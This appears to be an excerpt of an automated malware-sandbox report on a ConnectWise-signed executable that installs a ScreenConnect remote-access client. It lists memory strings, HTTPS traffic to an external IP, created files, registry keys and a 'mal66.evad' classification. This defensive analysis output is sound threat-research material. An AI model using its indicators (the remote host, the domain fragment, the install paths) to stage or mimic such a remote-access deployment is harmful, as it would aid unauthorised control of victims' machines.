                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                  Source: svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
                  Source: svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srfer
                  Source: svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srfuer
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                  Source: svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA312C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507247367.000001CEA3159000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507228196.000001CEA3107000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-DjzYTHDArzjEperSFKoy5hDVylCtJARcPfOWs0i
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600suer
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                  Source: svchost.exe, 00000008.00000002.2609297562.000001CEA3617000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA312C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                  Source: svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfssue
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfsuer
                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502Issuer
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                  Source: svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806045
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388501755.000001CEA3157000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA312C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388303192.000001CEA315A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfer
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                  Source: svchost.exe, 00000008.00000002.2609387245.000001CEA3642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                  Source: svchost.exe, 00000008.00000002.2609739077.000001CEA369C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf0
                  Source: svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf256
                  Source: svchost.exe, 00000008.00000002.2608129190.000001CEA28E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srfityCRL
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfDT
                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsuer
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                  Source: svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A664000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.staP
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A664000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.staPJ
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.staPJh
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.staPb
                  Source: dfsvc.exe, 00000002.00000002.2257457439.00000276A42F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.c
                  Source: unknown | HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49727 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49817 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49824 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49834 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49891 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                  System Summary

                  Source: 96r3GgxntQ.exe | PE Signature Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe | Code function: 0_2_00BBA495
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | Code function: 10_2_00007FFE7DD51B38
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | Code function: 13_2_00007FFE7DD81128
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | Code function: 13_2_00007FFE7E096915
                  Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 7608 -ip 7608
                  Source: 96r3GgxntQ.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, PopoutPanelTaskbarButton.cs | Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ProgramTaskbarButton.cs | Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, TaskbarButton.cs | Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, PopoutPanelTaskbarButton.cs | Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, ProgramTaskbarButton.cs | Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, TaskbarButton.cs | Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.2.dr, WindowsLocalUserExtensions.cs | Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engine | Classification label: mal66.evad.winEXE@18/77@2/2
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe | Code function: 0_2_00BB1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | File created: C:\Users\user\AppData\Local\Deployment
